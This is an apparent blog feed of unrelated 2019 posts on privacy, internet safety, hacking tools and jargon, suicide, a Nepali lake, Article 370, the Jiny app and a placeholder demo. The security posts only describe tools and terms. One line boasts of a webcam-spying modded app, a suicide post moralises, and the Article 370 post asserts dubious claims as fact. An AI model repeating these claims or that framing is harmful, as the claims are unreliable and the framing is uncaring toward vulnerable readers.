While privacy is an intrinsic human need, it is not an absolute value. It competes with different wants including that of being seen and heard. For instance, a billion people in the world live in some kind of “slum”—often an illegal housing settlement. This is expected to double by 2030 as urbanization increases. Because slums are unofficial or informal neighborhoods, governments often abdicate responsibility toward these communities, deeming them “invisible.” So when ambitious new schemes like the Social Credit system or the Biometric identity promise better inclusion and governance by linking people’s identities to social services and micro loans, it is understandable why many of these people desperate for change go along with these services. Beyond the state, corporations have long neglected this populace, deeming them high-risk and not worth the effort.

Amina Harun talks on a cell phone while selling watermelons in Nairobi, Kenya.

But with the rise of the data economy, tech companies like Facebook were quick to move into these new territories. In the name of empowering the “digital have-nots,” Facebook launched the “Free Basics” initiative (originally called Internet.org) in 2015, which offers limited free access to a select number of sites in partnership with telecom providers in developing countries. Facebook managed to defy net neutrality rules by claiming this to be a charitable act. By 2018, Facebook succeeded in connecting 100 million users through this effort and became “The Internet” to these users. The Free Basics initiative continues to be heavily criticized for the indiscriminate data-mining of the next billion users and for not offering them access to an open internet.

Myth #3: The impact of online advertisements

Interestingly, I found young people from the slums of Ludhiana and Hyderabad generally enthusiastic about Facebook’s highly targeted advertisements. They felt special. They felt recognized. They felt respected. Some loved the fact that ads would notify them of products that might interest them; “…a person can find whatever is best for him. Whenever the person is searching for something, the ad gives other options,” remarked Surain as he complained about the cost of “browsing.” This made his time online more “efficient”—crucial when you have a limited data plan. In China, tech giant Alibaba pioneered a new mobile payment system called AliPay that allows people to leverage their online reputation to gain access to small loans. They may give up their personal information, but for many, access to credit makes it worth it. After all, with a communist history where few people could own assets, their online trustworthiness becomes a proxy for creditworthiness.

Make no mistake though. Privacy will always be a core human value. However, there is a high likelihood that privacy is not on top of the agenda for the next billion. They strive to be heard and seen, and are accustomed to being “public.” Often they take risks with their privacy, especially because these digital worlds offer them far more freedom and exposure to new ideas than their lived conservative environments.

When the next billion users disappoint

When a child from a slum chooses to game instead of learn math, aid agencies and governments may feel disappointment. When farmers use their mobile data for porn, these agencies may grow concerned or even panic. There is this feeling that the internet as a critical resource is being wasted away. That the world’s poor are losing this opportunity to be productive.

We would be missing the point.

Double standards on who should be productive and who should enjoy leisure have long prevailed between the poor and the rich. But the next billion, just like those in the West, have the right to be ordinary, to seek for pleasure, and to make themselves a little happier.

When the internet was first prototyped by ARPANET (the Advanced Research Projects Agency Network funded by the US Department of Defense), the vision was to use this technology for information dissemination and social control. Efficiency was at the heart of this vision.

Final thoughts and my opinion

Today, of course, the way we use the internet hardly resembles this vision. And aren’t we glad? We made the internet a place where we can work and play, where we can push the spectrum of human desire, aspiration, and pleasure, even if we continue to struggle to keep this space respectable and inclusive.

We need to de-exoticize these users if we are going to genuinely have a healthy global digital culture. They need to be humanized, understood, and kept in mind when designing inclusive platforms. The internet is a critical public resource that is meant for all users—and that includes the world’s poor.

Three suggestions for a better and safe experience online, the Internet.

Wed, 04 Dec 2019 11:50:43 GMT

Many of you are familiar with the term Internet. Yeah, we all know about it. We can stay a night without sleep or a day without food, but can't even stay for a while when there is this distraction in our network due to traffic or unpaid bill. Data is the only thing we will recharge in time. It is many peoples preferred recharge more than recharging our own body.

Internet: It is a wide network of computers contains a different source of information. It is open for all, available for all.

Here, "open for all & available for all" is my main focus and Interest. So let's give your imagination a test and decide the suggestions. After all, we all use the internet for our own needs and benefits.

Imagine a place or some sort of group where people can gather. I know there are a lot, like Market complex, Cinema theaters, Social media groups or a Party and if keep mentioning the list will follow up. So let's give some constraints to decide. "for free". Now, what is that?

What is a place or group of people can gather for free?

You may find many answers. Most of them are your interests thinking they are free. Going to Church or Temple at the weekend, having a fun time with family and friends etc. This list also includes Internet usage. But the fact is even these are not free.

Do not trust everything that says free.

The Internet is just a place to gather for free, but not everything that says free is actually free. Yes, most of the services online are free but they are not on the right side or safe side of the internet. No one can provide a service entirely free, there should be something happening behind the scenes here.

Trust the website with (https) only.
Even if it is free, it should be for a limited time period.
Open sources are the only actually free services because at some point you should use your own skill to make something out of it.
Websites flooded with advertisements, just don't visit them if you don't know about that.
At least there should be some sort of registration for providing you something free.

Try to stay on the right side of internet usage. Even if it costs you.

Yes, there is something like the right side to keep you always safe from threat. Can you follow those? Try if you can follow or not.

You all are familiar with cracked versions and mods, right? what do they do so that you can access free service? They are actually removing the code or program that is supposed to tell the service provider (As it is valid or not). If they can modify the code what is the guarantee it was not affected with malicious code to spy or collect data?

Never trust modded or cracked versions, if you really can't believe this. Ping me in the comment section I can give you a modded app where I can even access your webcam.

Don't just believe what the Internet says. Have an opinion on it by gathering more info

The Internet is not a newspaper or textbook to give you only the accurate result, there are many lies, rumors floating all over the place. Most of them are fake, trying to lure you by good looking and pleasing manner. You should even doubt on this article, but doubting is not always the correct solution. look into the information you got, try to find more relevant things. After all, this is not a media (a service), it is Social Media (we decide what is true and what is wrong) majority role is true here.

Don't believe in me? Need some proof?

Here is the proof:

Open a new tab in your browser
Search for "Idiot" in google
Go to the images section
You will find someone familiar over there.

IPS, Founder, IIT Student's suicides. This brings our society's morals down.

Wed, 04 Dec 2019 02:30:45 GMT

My prayers to Vikram Kapoor, the departed soul, IPS officer.

Vikram Kapoor, an Indian Police Service (IPS) officer and Deputy Commissioner of Police (DCP) of NIT Faridabad, allegedly shot himself with his service revolver at his residence in Police Lines. While the exact reason behind the extreme step is not yet known, sources said that the IPS officer was upset from some days. he was due to retire from his service on October 31, 2020

Yesterday Vikram Kapoor. Recently, V G Siddhartha the founder of Café Coffee Day and many other IIT graduates are committing suicides. Now what we can learn is that life is not worth committing suicide for.

Success should not define us, failure should not define us; one should become bigger than the outcome

There may exist various reasons for every individual to take such decisions, but someone who is staying as role models committing suicide is very disappointing. Life is worth living. All of us should learn one thing: plan purposefully, prepare prayerfully, proceed positively, pursue persistently, produce productively. First, we need to set our goals, and, second, we need to audit our effort.

How we are going towards the goal and realize that more than working hard, we should work smart. When you are working smart, you will audit your life; you will also learn how to be flexible. Agility, mobility, and stability are important dimensions in doing business. If we can learn to be flexible, to enjoy what we are doing, then, we teach ourselves that we are bigger than the result.

If we look at their life, their assets were more than their liabilities. They could have clearly solved their problem. Somewhere we have to train our mind to healthy options; better options and not bitter options. Let us all pray for such a good souls and who did good work. Let us all be alert.

Common tools used by security professionals.

Wed, 04 Dec 2019 02:01:40 GMT

Now that we’ve learned the language of security professionals, it’s time to familiarize ourselves with the tools of trade. We’re going to take a look at some of the popular tools used by security professionals.

The tricks of the trade

Metasploit

Metasploit is an framework which is used for the hacking of different kinds of applications,operating systems,web applications etc., Metasploit contains various exploits, payloads,modules etc. Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems. As Metasploit is an open source where any one can use it. This framework supports different operating systems like windows, linux ,mac os x etc., Metasploit is preloaded in the Backtrack linux as there is no need for the backtrack users to install the metasploit again and again. IMHO, Metasploit is the single most powerful and useful tool for a wide variety of hacks. Personally, I like it so much I put it before the list of common tools. Remember this name: “Metasploit”. Below are a few more extremely helpful and common tools, sure to be found in any hacker’s computer.

Nmap

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

Wireshark

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.

Nikto2

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

Ettercap:

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

Kismet

Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

w3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

hping

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Burpsuite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

THC-Hydra

A very fast network logon cracker which support many different services.

SQLmap

SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

WebScarab

WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned.

Author @Akhil Naidu
Source @Xeus

Terms you should know before learning cybersecurity.

Tue, 03 Dec 2019 17:37:56 GMT

We just saw the most common abbreviations used by hackers. Now let us demystify some of the jargon and terminologies that you’ll find in the field of digital security. This is a comprehensive and up-to-date list of the most important words and phrases that you’re sure to encounter no matter which hat you choose to wear. These are the most common terms used by hackers.

Types of Malware

Malware, short for malicious (or malevolent) software, is software used by attackers to disrupt a victim’s computer operation, gather sensitive information, or gain access to private networks. It can appear in the form of executables (like batch file viruses), scripts or even as a part of other software. Malware is a general term used to refer to a variety of forms of hostile or intrusive software such as:

Adware

Adware is software designed to forcefully spam your system with ads. Some adware can pop up ads with such speed and frequency that they seem to be taking over everything, slowing down your system and tying up all of your system resources. However, the more subtle kind of adware that slowly inserts advertisements and tries to remain undetected for a long time is usually more successful.

Backdoor

A backdoor is a point of entry that circumvents normal security measures and can be used by a hacker to access a network or computer system. Backdoors aren’t necessarily evil. They are also used by system developers, network administrators and customer support. Backdoors effectively allow complete remote control of a system to the master. Hackers can spread their own backdoors by using a virus or a Trojan to set it up, thereby allowing them future access at their leisure.

Time bomb

A time bomb is a malicious program designed to execute at a predetermined time and/or date. Time bombs are often set to trigger on special days like holidays, or sometimes they mark things like Hitler’s birthday or 9/11 to make some sort of political statement. What a time bomb does on execution could be something benign like showing a certain picture, or it could be much more damaging, like stealing, deleting, or corrupting system information. Until the trigger time is achieved, a time bomb will simply remain dormant.

Trojan horse

A Trojan is a malicious software used to hack into a computer by misleading users of its true intent. The term is derived from the Ancient Greek story of the wooden horse that was used to help Greek troops invade the city of Troy by stealth.

Payload

The payload is the part of the malware program that actually executes its designed task, such as damaging the system or installing a backdoor or stealing information.

Virus

A self-replicating program that inserts itself into computer systems and causes damage. They can also be spread as the payloads of a Trojan.

Worms

A worm is a malicious program that can replicate itself onto other computers on a network. Unlike a virus, worms don’t need a human to be able to spread and infect systems. Once it infects a system, it uses that system to send out other copies of itself to other random systems attempting to infect them.

Logic Bombs

A logic bomb is a malicious program designed to execute when a certain criterion is met. A time bomb could be considered a logic bomb because when the target time or date is reached, it executes. But logic bombs can be much more complex. They can be designed to execute when a certain file is accessed, or when a certain key combination is pressed, or through the passing of any other event or task that is possible to be tracked on a computer. Until the trigger event the logic bomb was designed for passes, it remains dormant.

Rootkit

The malware most likely to have a human touch. Rootkits are installed by hackers on their victim’s computers. The rootkit is designed to camouflage itself in a systems core processes so as to go undetected. It is the hardest of all malware to detect and remove. Rootkits commonly attempt to install a backdoor and grant the hacker administrative (root level) privileges.

Keyloggers

A keylogger is a spyware program that is designed to log every keystroke made on a computer. The information that is collected can then be saved as a file and/or sent to another machine on the network or over the Internet, making it possible for someone else to see every keystroke that was made on a particular system. By using this information, it can be easy for a hacker to recreate your usernames and passwords, putting all kinds of information at risk and susceptible to misuse.

R.A.T.

Remote administration Tools are a means of controlling other computers from yours. A backdoor is a form of a remote administration tool.

Polymorphic Virus

A polymorphic virus is a virus that will change its digital footprint every time it replicates. Antivirus software relies on a constantly updated and evolving database of virus signatures to detect any virus that may have infected a system. By changing its signature upon replication, a polymorphic virus may elude antivirus software, making it very hard to eradicate.

Cookies

A cookie is a small packet of information from a visited webserver stored on your system by your computer’s browser. It is designed to store personalized information in order to customize your next visit. For instance, if you visit a site with forms to fill out on each visit, that information can be stored on your system as a cookie so you don’t have to go through the process of filling out the forms each time you visit.

Daisy-chaining

process where a hacker gains entry into a computer or network and then uses it to gain access to another.

IP address

Internet protocol address is the distinctive numeral fingerprint that each device carries that’s connected to a network using Internet Protocol. If you have a device’s IP address you can often identify the person using it, track its activity, and discover its location. These addresses are apportioned by the regional Internet registries of the IANA (the Internet Assigned Numbers Authority). Hackers can use knowledge of your IP address to break into your system over the internet.

Phreaking

It is the action of hacking into a telecommunications network (such as Verizon or Vodafone) for the purposes of, for example, obtaining free calls or data. It is now a mostly defunct practice as modern communication systems are highly secured and nearly impossible to break into.

VPN

A Virtual private network can simply be thought of as accessing a normally geographically distant system from your own. A VPN allows it’s users to hide their identity by routing all connections from your system through the VPN. Hence, any websites you visit while using a VPN will see the VPN’s IP address and not yours.

VPS

A virtual private server is a virtual machine sold as a service by an Internet hosting service. They are meant to be functionally equivalent to dedicated servers (you can host websites on them).

General terms

IRC:

Internet relay chat is a protocol used for both groups and for one-on-one conversations. Often utilized by developers and hackers to communicate or share files. Because they are usually unencrypted, hackers can sometimes use packet sniffers to steal personal information from them.

Bot

A bot is a software “robot” that performs an extensive set of automated tasks on its own. Search engines like Google use bots, also known as spiders, to crawl through websites in order to scan through all of your pages. In these cases bots are not meant to interfere with a user, but are employed in an effort to index sites for the purpose of ranking them accordingly for appropriate returns on search queries. But when black hats use a bot, they can perform an extensive set of destructive tasks, as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.

Botnet

A botnet is a network of computers under the control of a person. When the person is launching a DDoS attack for instance, they will use a botnet under their control to accomplish it. Most often, the users of the systems will not even know they are involved or that their system resources are being used to carry out DDoS attacks or for spamming. It not only helps cover the black hat’s tracks, but increases the ferocity of the attack by using the resources of many computer systems in a coordinated effort.

DoS

Denial of Service is a type of attack meant to overload a system so that it is unable to service normal users. DoS may be used against a website or computer network to make it temporarily unresponsive. This is often achieved by sending so many content requests to the site that the server overloads. Content requests are the instructions sent, for instance, from your browser to a website that enables you to see the website in question. Some have described such attacks as the Internet equivalent of street protests and some groups, such as Anonymous frequently use it as a protest tool.

DDoS

A DoS using a number of separate machines, typically a botnet. DDoS attacks are one of the most destructive hacking techniques, costing billions in damages to companies each year. Some of the biggest DDoS attacks can reach speeds of up to hundreds of Gigabits per second.

Dumpster Diving

The act of rummaging through the trash of an individual or business to gather information that could be useful for a cyber criminal to gain access to a system or attain personal information to aid them in identity theft or system intrusion. One person’s garbage can indeed be a cyber criminal’s treasure.

Zero Day Threat/Exploit

Every threat to your computer security has to start somewhere. Unfortunately, the way most of us protect ourselves from cyber threats and intrusions, is to use detection programs (anti-viruses) that are based on analyzing, comparing and matching the digital footprint of a possible threat to an internal database of threats that have been previously detected, reported and documented. That’s why we all have to go through those seemingly never-ending updates to our antivirus programs, that’s how the database is updated and the newest threats are added to the list of what the scanners look for. That inherent flaw in our scanners is what makes a Zero Day threat so dangerous. A Zero Day threat is pristine and undocumented. From the very first day a particular threat is ever deployed (zero day) until that threat is noticed, reported, documented and added to the index, it is an unknown. As far as standard protection goes, unknown means invisible – and when it comes to cyber threats, invisible can definitely mean trouble.

Doxing

Discovering and publishing the identity of an otherwise anonymous Internet user by tracing their online publically available accounts, metadata, and documents like email accounts, as well as by hacking, stalking, and harassing.

Hash

A hash is a string or number generated by an algorithm from an input like a message or file. In a communications system using hashes, the sender of a message or file can generate a hash, encrypt the hash, and send it with the message. On decryption, the recipient generates another hash. If the included and the generated hash are the same, the message or file has almost certainly not been tampered with.

Security through obscurity

A false approach to security, obscurity is a way of dealing with security holes by trying to hide them and hoping nobody finds them instead of fixing the bug properly

And now you are a bit closer to becoming a real hacker. Let’s continue onwards and learn about the most common tools used by hackers and penetration testers.

Author @Akhil Naidu
Source @Xeus

Important abbreviations used by hackers.

Mon, 02 Dec 2019 15:35:15 GMT

Below are some frequently used abbreviations and acronyms that all hackers should know about. The abbreviations we’re about to take a look at are used by programmers, database administrators, hackers - the technically savvy bunch. So let’s get started and soon you’ll be using these yourself:

The musical notes in a hacker's symphony

Hacking Abbreviations

DoS: Denial of Service
DDoS: Distributed Denial of Service
Dox: Not an acronym, but a slang term meaning: To publicly identify or publish private information about (someone) especially as a form of punishment or revenge
FUD: Fully Undetectable. For eg: A FUD virus LEA: Law Enforcement Agency
R.A.T: Remote administration tool
SE: Social Engineering
Skid: Script Kiddie
SQLi: SQL Injection
XSS: Cross-Site Scripting Networking Abbreviations
AP: Access Point (eg: A Wi-Fi router)
DNS: Domain Name System (For converting a URL to IP address)
LAN: Local Area Network
MAC: Media Access Control
NAT: Network Address Translation
NIC: Network Interface Card
HTTP: HyperText Transfer Protocol
HTTPS: HyperText Transfer Protocol Secure
SSH: Secure Shell, used to connect to servers remotely
FTP: File Transfer Protocol
VM: Virtual Machine
VPS: Virtual Private Server
VPN: Virtual Private Network
WAN: Wide Area Network
IP: Internet Protocol
ISP: Internet Service Provider
TCP: Transmission Control Protocol
URL: Uniform Resource Locator/Location

Programming Abbreviations

ASCII: American Standard Code for Information Interchange
API: Application Programming Interface
BIOS: Basic Input Output System
CSS: Cascading Style Sheets
Nix: Unix based operating system, usually referred to here when referring to DDoS’in
HTML: HyperText Markup Language
JS: JavaScript
XML: eXtensible Markup Language

Computer Hardware Abbreviations

CD: Compact Disk
CDR: Compact Disk Recorder
CDRW: Compact Disk Re-Writer C
D-ROM: Compact Disk: Read Only Memory
CPU: Central Processing Unit
DDR: Double Data Rate
DRAM: Dynamic Random Access Memory
DVD: Digital Versatile Disc
FPS: Frame Per Second
FPU: Floating Point Unit
HDD: Hard Disk Drive
IC: Integrated Circuit
OEM: Original Equipment Manufacturer
PCI: Peripheral Component Interconnect
PSU: Power Supply Unit
RAID: Redundant Array of Independent Disks
RAM: Random Access Memory
ROM: Read Only Memory
SSD: Solid State Drive UPS: Uninterruptible Power Supply
USB: Universal Serial Bus

Other Abbreviations

CLI: Command Line Interface
DMCA: Digital Millennium Copyright Act
GUI: Graphical User Interface
I/O: Input & Output
KISS: Keep it simple stupid
PDF: Portable Document Format
PGP: Pretty Good Privacy
OS: Operating System
TLD: Top-level domain (e.g: .com, .org)
RSS: Really simple syndication
WYSIWYG - What You See Is What You Get

And there we go, now you too can talk like a hacker. But abbreviations are only half the story. Next up we’re going to take a look at the most common phrases and terms that hackers use.

author @Akhil Naidu

The new lake Kajin Sare found in the highest place of world.

Mon, 02 Dec 2019 15:16:02 GMT

A newly-discovered lake in Nepal is likely to set a new record of being the world's highest lake replacing Tilicho, which is situated at an altitude of 4,919 meters in the Himalayan nation and currently holding the title. The Kajin Sara lake in Manang district was discovered about a few months ago by a team of mountaineers, the Himalayan Times reported. It is located at Singarkharka area of Chame rural municipality

The Kajin Sara lake

in Manang district was discovered about a few months ago by a team of mountaineers

"As per the measurement of the lake taken by the team, it is located at an altitude of 5,200 meters, which is yet to be officially verified. It is estimated to be 1,500-metre-long and 600-meter-wide," Chame rural municipality Chair Lokendra Ghale was quoted as saying by the report. "The lake would be the world's highest lake if its altitude of 5000-plus meters is officially verified," he said.

The Tilicho lake, situated at an altitude of 4,919 meters, is 4 km long, 1.2 km wide and around 200 meters deep.

source @Nepalay Times
author @Akhil Naidu

Story of Article 370 of the constitution of India.

Mon, 02 Dec 2019 14:44:25 GMT

Maharaja Hari Singh, who was the King of Jammu and Kashmir wanted it to be called another Switzerland. He did not want to merge Jammu and Kashmir with Pakistan or with India. But Pakistan unfairly attacked Jammu and Kashmir and due to a weak-armed force, Hari Singh was forced to ask India for help. India agreed to help only if Jammu and Kashmir would merge with India. Hence, there was an agreement signed between Maharaja Hari Singh and Jawahar Lal Nehru on 26 October 1947. And also a special privilege was given to the citizens of J & K under Article 370 ( eventually written by Gopalaswami Ayyangar).

Article 370 provides certain provisions to the state of Jammu and Kashmir, giving it special autonomy.

Special privilege to the J & K citizens

The Jammu and Kashmir citizens have dual citizenship.
The term period of Jammu and Kashmir legislative assembly is of 6 years unlike that of other states of India.
The order of the Supreme court is not valid in Jammu and Kashmir.
Only a permanent resident of Kashmir can own land in Kashmir. No outsider can have landed in Kashmir.
A Women who marries an Indian of the other state would no more have its Kashmiri citizenship. Whereas if she marries a Pakistan, her citizenship will be the same ( ie, of a Kashmiri )
Except for defense, foreign affairs, and communication, all the other laws have to be passed by the State government.
All the bills passed by the parliament should also have to pass by the State government.Example: The RTI can not be filed by the Kashmiri citizens because the RTI bill is not passed by the State government.
The Article opposes the implementation of national emergency and financial emergency under Article 352 of the Indian constitution. The emergency can only be imposed in case of external aggression.
Shariat law applies to women of Kashmir.
RTE is also not implemented in Kashmir.

Pros of Article 370

No outsider is allowed to purchase land in Jammu and Kashmir.It's difficult for outsiders to establish a business in Kashmir, so the citizens of Kashmir get an advantage here as there are less competition and more opportunities for the citizens.

Unlike Delhi NCR, there is no population blast in Kashmir because of the low settlement of people of other states in Kashmir. Local brands are still running it also includes Low crime rate (but high terrorism).

Cons of Article 370

Lack of medical facilities because there are less private hospitals and the condition of government hospitals are poor. Due to lack of employment, youths enroll themselves in terrorism. No industrial sector is available. Corruption is more in J & K than from other states. Only Muslims can become Chief ministers of J & K. So the politics is run in the name of religion there. Poor education and low GDP.

Gender bias

Many claims that the article is gender-biased as it gives more benefits to men, not to women. But this is only for the land and marriage case as I have mentioned above.

Special provision under Article 35A to J & K

Employment under the State government.
Acquisition of immovable property in the state.
Settlement in the State.
Right to scholarship and such other forms of aid as the state government may provide.

Source by @Tanmay Pant, B.sc.( honours) Geology, Hansraj College, University of Delhi (2019).

Jiny by JIO, The world's first Assistive UI application which might digitalize India further.

Mon, 02 Dec 2019 13:41:52 GMT

There is a huge digital divide that exists in India where even most of our parents, moms, in particular, struggle to use digital applications. As we go deeper into Indian Tier 2/3 cities, and villages, the divide continues to grow wide. The result is that while English India seems to be flourishing through the adoption of digital technology, the Vernacular Bharat continues to struggle.

Using even slightly complex apps makes them feel strange, uncomfortable, and apprehensive. They are constantly afraid: “what if something goes wrong?”

Jiny is building India’s first mobile adoption assistant which makes mobile apps Bharat-friendly and easy to use. It enables a user to complete an entire transaction in his/her very first try.

Assistive UIs assist the users in interacting with the system (apps) at every step.

In normal GUIs (Graphical UIs), the interaction of the user with the system (apps) is unassisted, which means that all the interactions are supposed to be figured out by the users themselves which requires users to think and hence increase the cognitive load. Whereas in Assistive UIs, all these interactions are assisted by the UI itself. They act similar to the turn by turn navigation of Google Maps but do it for the apps.

Introducing "Jiny" - World's First Assistive UI Platform

A first-of-its-kind assistant who/which can speak in users native language, guide them live on the app screen, and help them easily do complex tasks like making online payments. Jiny integrates with digital businesses to accelerate their app transactions and adoption in vernacular Bharat.

Vernacular Bharat - "Going Local", Bharat is lagging in the internet age. So researchers invited users from Bharat to understand why? For this research, they invited people of different occupations, age, gender, experience with smartphone and places.

What is the research and the smartphone knowledge of the participants?

Some of them are very much familiar with smartphone, WhatsApp, YouTube, and other apps. While some are completely new to the smartphone and some never done any online transaction thinking about its authenticity. Few of them commented that the newer generation understand everything quickly, and for them it takes times. One of them completely dependent on children while few are dependent on the trusted shopkeeper for their mobile recharge. All of them are familiar with smartphones and using them. They are asked to try to make an online transaction.

They choose their transaction platform themselves for a transaction, here are some comments by them after a few trails.

How do I enter the time?
I got confused about what sort of recharge to make, and for whose phone.
How can I tell which seat is reserved and which is free?
There are too many options, mobile prepaid a mobile postpaid... so ... I go for prepaid?

None of them could complete the transaction!! It seemed too difficult, but what if making online transaction becomes as easy as watching videos? Jiny helped them to assist using its Assistive User Interface, it successfully guided each individual a successful transaction even though it took considerable time than usually.

Comments after a successful transaction using Jiny

This is the first time I've seen something like this.
Because it kept telling me what to do, I knew I was on the right track.
It takes you through the entire process.
If all apps had this, then this would be very helpful to people
Say you want to book a ticket or do anything else, with this app you can easily do it.
You can do it yourself, you don't need a second person.
It is explained so clearly, I can do it 100%

It took considerable time to do a transaction than usual, but it's progress and gradual development can be seen in people. After a few transactions, they can independently do their transactions without the interference of others.

I feel like, "This app can change the way my parents and neighborhood use a smartphone". What do you think? Comment below

More Info on Jiny

Official Website of Jiny

Assistive UI/ AUI by Jiny Official

Youtube Video

India's opportunity to become THE global leader.

Mon, 02 Dec 2019 12:45:11 GMT

We have the largest workforce in the world - close to 500 million strong - more than the population of every major country except China. This kind of opportunity doesn't come along often and we are squandering it. People don't stay young forever. We have maybe 25 years to capitalize on this and I know if we do we'll shoot straight to the top. I'm not suggesting it's an easy job but I truly believe we are capable enough to lift ourselves to the top.

In my opinion there are two factors that disproportionately affect our ability to generate value.

First, our people are not skilled enough, thanks to archaic and utterly pointless educational curricula. Bad education is the root cause of our suffering. Just ask the millions of jobless engineers. We're spending a paltry 3-4% of our GDP on education in comparison to the 6-8% of other developing nations. I strongly believe that solving the education problem will solve most other issues.

Second, policy changes and passing of bills take way too long. That's a result of the democratic process and I respect that, but again, people don't stay young forever. There are a lot of policies and rules that need an overhaul and the sooner we change them, the faster we can grow.

More Info

Demo

Thu, 18 Jul 2019 00:00:00 GMT

Est incandescit maris pretium

Lorem markdownum: cthonius ambiguis illis et potuisse placidam: Elide probetne in nomen fatum! Possidet cantu nunc moverat eripere inculpata. Dumque sunt utque protulit trunci legumque munus nomen; non.

Totis formaeque te non: care vir retractat, legit iste haud blanditiis facta ministros conexis isti laedor quae quem. Quale moram meum Telephus iubenti bucina amato quae matura dabat caietam adsumere haeret, multo.

Et pateret plebe

Sponte femina confusaque Ledam sive, litusque in ferat mergit illic, de. Verba vulnera gulae timet vertice honorque iuvenem perspicit tenentibus sulco eripui scopulo.

var gnutellaMetal = kibibyte_processor;
if (spiderDriverMemory(integer_master)) {
    wais.kilohertzLog = port_srgb_mashup + shortcut;
    zone_tooltip = 3;
    desktop -= snapshotVirusEnterprise;
} else {
    web -= siteModelPage.panel.payloadPayload(text_enterprise_native, 2,
            printer_pim) - jspCut;
}
frozen_station_num.copy += 234601 + integerDefaultWeb - monochrome;
if (programmingSinkMail + down_vfat_ata) {
    home += driveNicCut.hub_play(guidTopologyUser, template_record_server(2,
            click));
    del(parameter_ivr);
}

Flumina rectorque biformis actis dederam

Atro removente sed qui vitae, bibat citharam puer. Potius tempora solet refert, fugisse ait nimia naufraga. Et Bacche nymphae varios conplexibus populus medium meruisse inmensa ac. Committit fratremque et tunc, ostendit vox, tum sua; videbitur imitata!

Nec actaque novemque meruit? Lac ore sacrisque est Graium vecordia: precatur sonant; nam nec ambo, vina. Vitta summis ut tingui, coniunctior quam Peleusque miliaque cum, et animae animos.

Tophis est fuit ille vitaque nupta florentis virilia. Adspexi dixit, processit invenit, in opus. Vindice undis, tepidique post monilia, vibrataque, revertitur ipse attonitus relinque contento antris; desere, huic. Anser qui maneat, adspicit veluti Parcite citharaque vobis finemque guttura, salutent genitor ad clarus et de bellica et.

Meae furor se et meris quinos cogor

Lorem markdownum, quinquennia; mentes teli mixto rumpitque frustra meae hic positi carpsere cessit: cruento quantoque ab. Fistula luctus.

Quia sorte moveri postis forma et sorte

Suis mearumin, more futuri ipse sua damnavit et cognita utentem, nudae vero, Atridae ubera tibi. Est irascere Marte in metuens circuit auster. Qui redire Themis si gesserunt, non facit hoc nomen stillanti: sunt. Ferae circum, Dryantis, magna vix, sed Arctonque quis conclamat et manes, lyra. Ter humi iunctam magnum; quem potentia.

Si res sua iugulum onerique exercere omnes
Fovesque semine
Quam Atlas nostro pugnavimus auras Appenninigenae esset
Vinxerat misit
Iuro Iovis talia seu Amathunta tegminis positoque
Aevo adsunt

Habebit ritibus sensimus ante. Concutio scire ab lanas; videbam conplexu ne sola quod decepto ipsorum nec ponti in versus eripuit luctibus, amoris! Et fundere prospiciens petere vidisse res defenditur dixerat. Iam non; erat medius quid, dicta ortus. Et formae.

Cover image by my cat